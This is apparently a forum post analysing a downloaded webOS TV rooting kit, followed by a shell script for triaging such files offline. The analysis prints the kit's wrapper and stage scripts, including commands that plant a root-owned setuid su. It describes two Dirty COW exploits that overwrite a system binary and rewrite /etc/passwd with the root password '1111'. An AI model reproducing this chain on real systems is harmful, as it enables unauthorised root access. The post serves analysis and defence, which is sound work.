I've done an analysis of the root access method described at http://webos-forums.ru/topic4650.html ...
Disclaimer: I do not have a webOS TV and have not attempted or verified these steps.
There are 12 steps to the procedure:
Steps 1, 2 and 3 are all about setting up a developer account, installing a Developer Mode application on your device, enabling Dev Mode Status and Key Server switches, and gaining SSH developer access to your device.
Step 4 involves downloading a file from http://zalil.su/6937580 - you should be wary of downloading executables from random sites and executing them on your device.
Steps 5 through 7 detail how to get this file onto your device.
Steps 8 through 12 are running the script and getting the root shell.
So, let's look at things in more detail ...
The downloaded file is a shell script containing an embedded binary archive:
Code:
#!/bin/bash
uuencode=0
binary=1
match=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)
payload_start=$((match + 1))
if [[ $binary -ne 0 ]]; then
tail -n +$payload_start $0 | tar -xzvf - > /dev/null
fi
chmod +x *
./rt.sh
rm firstg
rm secstg
rm rt.sh
rm su
rm rep
exit 0
PAYLOAD:
<... lots of binary encoded data ...>
To get at the archive without running the script, copy everything after the PAYLOAD: line into a file with a .tar.gz extension; that is exactly what the tail -n +$payload_start command in the script does to itself before piping the result into tar.
Here is the contents of the archive:
Code:
$ tar ztvf ~/Downloads/6937580_root.tar.gz
drwxrwxrwx 0 root root 0 Jul 28 16:21 ./
-rwxrwxrwx 0 5482 5000 168 Jul 28 15:20 ./rep
-rwxrwxrwx 0 5482 5000 416 Jul 28 15:35 ./rt.sh
-rwxrwxrwx 0 5482 5000 39987 Jul 28 15:19 ./secstg
-rwxrwxrwx 0 5482 5000 11052 Jul 28 15:24 ./su
-rwxrwxrwx 0 5482 5000 16236 Jul 28 15:19 ./firstg
Let's look at each file individually:
- rt.sh - a shell script which sequences the rooting procedure
- firstg - a binary executable
- rep - a shell script which copies the su executable from /var/palm/jail/com.palm.devmode.openssh/media/developer/su to /dev/shm/test/su and changes ownership of the su executable to root
- secstg - a binary executable
- su - looks like the standard su program from busybox
Let's take a deeper look at rt.sh:
Code:
#!/bin/sh
echo "first stage"
./firstg /usr/bin/ApplicationInstallerUtility rep > /dev/null 2>&1
sleep 2
echo "second stage"
./secstg > /dev/null 2>&1
sleep 2
echo "third stage - "
echo "try install any app from market"
echo "wait..."
while [ ! -f /dev/shm/test/su ]
do
sleep 2
echo "try install any app from market"
done
sleep 1
echo "third stage ok"
echo "try get root - input password 1111"
/dev/shm/test/su
The firstg binary contains the following interesting strings:
Code:
usage: dirtyc0w target_file new_content
GCC: (crosstool-NG linaro-1.13.1+bzr2709 - Linaro GCC 2014.11) 4.9.3 20141031 (prerelease)
GNU C 4.9.3 20141031 (prerelease) -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mlittle-endian -mtune=cortex-a9 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
/home/christopher/Development/linaro/.build/src/eglibc-linaro-2.19-2014.08/...
/home/christopher/Development/linaro/.build/src/gcc-linaro-4.9-2014.11/...
/home/evgen/dev/arm-linux-gnueabi-linaro_4.9.3-2014.11/...
crtstuff.c
dirtycow.c
elf-init.c
fstat.c
The dirtyc0w program name in the usage string identifies this as Dirty COW (CVE-2016-5195), a race condition in the Linux kernel's copy-on-write handling that lets an unprivileged process write into a file it is only allowed to read, including root-owned binaries. See https://dirtycow.ninja/ for more details on Dirty COW.
So firstg seems to be the canned exploit found at https://github.com/dirtycow/dirtycow...ter/dirtyc0w.c and the intent of the firstg call is to overwrite the start of the /usr/bin/ApplicationInstallerUtility binary with the contents of the rep script. Because the file then begins with #!/bin/sh, the next time it is executed the kernel runs it as a shell script rather than as an ELF binary. Note that the Dirty COW write lands in the page cache rather than on disk, so the patched binary normally reverts to the original once that page is evicted or the device reboots.
So let's look at the rep script:
Code:
#!/bin/sh
mkdir /dev/shm/test
cp /var/palm/jail/com.palm.devmode.openssh/media/developer/su /dev/shm/test/
chown root:root /dev/shm/test/su
chmod u+s /dev/shm/test/su
This takes the su binary that was unpacked into the openssh jail's /media/developer directory and places a copy in /dev/shm/test/ owned by root with the setuid bit set, so whoever runs that copy gets a root shell once su accepts the password.
The secstg binary contains the following interesting strings:
Code:
$ strings secstg
/tmp/.ssh_bak
./.ssh_bak
root:
WejG7Q39pocco
sshd:
/etc/passwd
[-s] [-n] | [-h]
-s open directly a shell, if the exploit is successful;
-n combined with -s, doesn't restore the passwd file.
-h print this synopsis;
If no param is specified, the program modifies the passwd file and exits.
A copy of the passwd file will be create in the current directory as .ssh_bak
(unprivileged user), if no parameter or -n is specified.
Password overridden to:
1111
Root password is:
Enjoy! :-)
/home/tcwg-buildslave/workspace/tcwg-make-release/label/tcwg-x86_64-ex40/...
GNU C 4.9.4 20151028 (prerelease) -march=armv7-a -mtune=cortex-a9 -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
/home/evgen/dev/toolchains/gcc-linaro-4.9-2016.02-x86_64_arm-linux-gnueabi/...
So secstg seems to be the canned exploit found at https://github.com/gbonacini/CVE-201...aster/dcow.cpp and the intent of the secstg call is to rewrite root's entry in /etc/passwd (the root: and WejG7Q39pocco strings look like the replacement entry and its precomputed crypt(3) hash) so that the root password becomes "1111"; since rt.sh runs it with no parameters, a copy of the original passwd file is left in the current directory as .ssh_bak.
The rest of rt.sh then asks the user to install any application from the market. That causes the system to run the modified /usr/bin/ApplicationInstallerUtility, which now starts with the rep script and which presumably runs as root (the chown and chmod in rep only work as root). rep copies the su binary to /dev/shm/test/, a location the unprivileged script can reach, and makes it root-owned and setuid. The wait loop in rt.sh notices the file appear and runs it; the user types the new root password 1111 and is presented with a root shell.
-- Rod
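One way to triage a file of this shape without ever executing it, as an added example that is not part of the post above or of the script it analyses: it rebuilds the wrapper's layout (shell stub, PAYLOAD: line, raw .tar.gz bytes) from constructed stand-in files, carves the archive out with the same grep -n / tail -n +N trick the wrapper applies to itself, checks that what follows the marker really is a gzip tar, lists the members, and greps the extracted files for the indicator strings quoted in the analysis (dirtyc0w, dcow, /etc/passwd, chmod u+s, chown root, /dev/shm). The function names carve_payload, list_payload, scan_indicators and make_sample, and the contents of the sample files, are assumptions of this example, not anything from the real download.

```shell
#!/bin/sh
# Added example: offline triage of a self-extracting shell script laid out
# like the one analysed above (shell stub, a PAYLOAD: line, then raw .tar.gz
# bytes). The wrapper is never executed; the archive is carved out and read.
# The files built by make_sample are constructed stand-ins, not the real
# rt.sh / rep / firstg / secstg from the downloaded file.
set -eu
export LC_ALL=C

# Carve the archive that follows the PAYLOAD: line out of $1 into $2.
# Same grep -n / tail -n +N trick the wrapper uses on itself, but with
# grep -a so GNU grep reports the line instead of "Binary file matches".
carve_payload() {
    marker=$(grep -an '^PAYLOAD:$' "$1" | head -n 1 | cut -d ':' -f 1)
    if [ -z "$marker" ]; then
        echo "carve_payload: no PAYLOAD: marker in $1" >&2
        return 1
    fi
    tail -n "+$((marker + 1))" "$1" > "$2"
    tar -tzf "$2" > /dev/null   # fails if the bytes after the marker are not a gzip tar
}

# List members without extracting, as the post does with tar ztvf.
list_payload() {
    tar -tzf "$1"
}

# Extract into scratch dir $2 and grep each member for indicator strings.
# The indicator list is lifted from the strings quoted in the analysis:
# exploit names, setuid/ownership changes, passwd tampering, /dev/shm drops.
scan_indicators() {
    mkdir -p "$2"
    tar -xzf "$1" -C "$2"
    for f in "$2"/*; do
        [ -f "$f" ] || continue
        for pat in dirtyc0w dcow /etc/passwd 'chmod u+s' 'chown root' /dev/shm; do
            if grep -aqF -- "$pat" "$f"; then
                printf '%s: %s\n' "$(basename "$f")" "$pat"
            fi
        done
    done
}

# Build a constructed stand-in for the downloaded file under $1; print its path.
make_sample() {
    mkdir -p "$1/pkg"
    printf '#!/bin/sh\necho "first stage"\n./firstg /usr/bin/ApplicationInstallerUtility rep\n' > "$1/pkg/rt.sh"
    printf '#!/bin/sh\nmkdir /dev/shm/test\nchown root:root /dev/shm/test/su\nchmod u+s /dev/shm/test/su\n' > "$1/pkg/rep"
    printf 'usage: dirtyc0w target_file new_content\n' > "$1/pkg/firstg"
    printf 'root:\n/etc/passwd\nPassword overridden to:\n1111\n' > "$1/pkg/secstg"
    tar -czf "$1/payload.tar.gz" -C "$1/pkg" .
    cat > "$1/sample_root.sh" <<'STUB'
#!/bin/bash
match=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)
tail -n +$((match + 1)) $0 | tar -xzvf - > /dev/null
chmod +x *
./rt.sh
exit 0
PAYLOAD:
STUB
    cat "$1/payload.tar.gz" >> "$1/sample_root.sh"
    echo "$1/sample_root.sh"
}

# Stand-alone demo: build the sample, carve it, list it, scan it, clean up.
main() {
    work=$(mktemp -d)
    sample=$(make_sample "$work")
    carve_payload "$sample" "$work/carved.tar.gz"
    echo "== archive members =="
    list_payload "$work/carved.tar.gz"
    echo "== indicator hits =="
    scan_indicators "$work/carved.tar.gz" "$work/unpacked"
    rm -rf "$work"
}
main
```

Against the real download you would call carve_payload ./6937580_root.sh out.tar.gz followed by list_payload and scan_indicators on a PC, never on the TV; nothing from the archive is executed, and the extraction happens in a scratch directory you can delete afterwards. The scan is only a quick hint: a binary that has been stripped or packed will not carry these strings, so a clean scan is not a clean bill of health.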